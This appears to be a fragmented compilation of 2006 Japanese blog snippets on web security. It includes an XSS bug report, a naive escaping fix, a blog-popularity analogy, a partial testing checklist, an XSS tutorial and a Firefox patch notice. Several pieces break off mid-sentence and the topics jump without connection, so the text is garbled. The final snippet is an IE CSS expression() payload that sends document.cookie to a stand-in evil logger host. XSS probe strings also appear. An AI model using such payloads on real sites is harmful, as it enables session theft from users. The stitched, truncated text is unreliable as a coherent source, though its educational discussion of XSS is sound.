December 2, 2006 04:30 Category: Lightweight Languages
The simplest way to avoid XSS in an error message
404 Blog Not Found: perl+javascript - Bug fix for the Hatena and short-URL mashup.
Tech Memo Pad (Gijutsu Memochou) - XSS in dankogai's app
HTML was not escaped when outputting the error message.
I almost overlooked it. In cases like this, I would like it reported in a form that is directly visible from the original entry, such as a TB or a comment.
Thinking it odd that the response was being interpreted as text/html in the first place, I looked at the header:
% HEAD 'http://u.dan.co.jp/r.cgi/<script>alert('easy%20xss');</script>'
500 Internal Server Error Co
Somewhere, I reported a certain issue to IPA, and today word came back that the fix was complete, but... when I looked at the source, they were doing the XSS countermeasure in JavaScript. (Is that OK??)
input1 = input1.replace("<", "&lt;");
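Thinking about the elements that make something popular
Taste ... sweet, spicy, bitter, umami. You cannot tell on your own.
Service ... comment section, trackback section. A blog without them is a "tachi-GUI" (stand-up) soba shop.
Location ... a property one click's walk from the ○× news site.
Price ... the time it takes to read. The more expert the blog, the higher.
Nutrition ... information value. Over-nutrition is, in its own way, bad for your health.
Freshness ... raw items (current events) have a best-before date. Processed foods keep.
Interior ... CSS, blog parts, illustrations, video, FLASH.
Chains: from the privileged class to the masses (the mob)
High-end restaurant: corporate and celebrity blogs. Ties are required in the comment section. Call the manager.
Family restaurant: Hatena popular entries. [illegible]. [illegible], GIGAZINE.
Fast food: Hatena notable entries. Discussing Hatena on Hatena. [illegible] smile ¥0.
Gyudon shop: 2channel. Never mind that, 1: [illegible] got the wrong board.
Ramen: SNS. Addictive.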
Hello! [illegible]! This is Test Bancho.
The other day [name illegible]-san told me that there is apparently a check sheet like this for web applications.
SECGURU: Web Application Testing cheatsheet
It is quite interesting, so I roughly put it into Japanese! (Special thanks to: Jun'ya-san)
* It may contain mistakes.
1. Application name and version
2. Component name
3. Communication protocol; if SSL, the version and cipher
4. Parameter checklist
   URL request
   URL encoding
   Query string
   Header
   Cookie
   Form
   Form (Hidden)
   Client-side validation checks
   Presence of unused, unnecessary parameters
   Maximum/minimum string length
   Concatenated commands (Concatenate
Hello hello!! It's time for cross-site scripting!
Speaking of XSS...! The first thing that comes to mind is missed sanitization in the step from submitting input data to displaying it for confirmation, right!
For example, a page that takes the parameters received from a form like this and displays them for confirmation!
(Input)
<form action="register.cgi" method="post">
Title: <input type="text" name="title"> ← enter "I'm Hamachi-chan!"
Body: <input type="text" name="body"> ← enter "Hello hello!!<script>alert(1)</script>"
</form>
(Confirmation)
<p>Is it OK to register with this content?</p>
<p>
Title: I'm Hamachi-chan!<br>
Body: Hello hello!!<script>alert
On July 26 (US time), the Mozilla Foundation disclosed that security holes had been found in the web browser "Firefox" and released version 1.5.0.5, which fixes them. They include dangerous security holes that allow an arbitrary program to be executed merely by accessing a specially crafted web page. For this reason, the Mozilla Foundation recommends that all Firefox users upgrade. Version 1.5.0.5 has also been released in the localized editions, including Japanese.
The latest version, 1.5.0.5, fixes the following 12 security holes. Of these, "MFSA 2006-55", "MFSA 2006-51", "MFSA 2006-50", "MFSA 2006-48", "MFSA 2006-46", "MFSA 2006-45", "MFSA 2006-44
<html>
<body>
<style type="text/css">
h1 { background#:/*;*/ expression('url(http://commonevillogger.example.com/log.php'+document.cookie+')'); }
</style>
<h1>heading</h1>
</body>
</html>
The above is an example that sends the Cookie to a malicious site. It works in IE only.
(Incidentally, even though expression is used, the Cookie is sent to commonevillogger.example.com only once. Personally I find that surprising, because I know that doing an alert with expression ends up behaving like a browser crasher, and I also know of accidents where a reload was planted and ended up putting load on the server. Something like an AutoF5 attack.)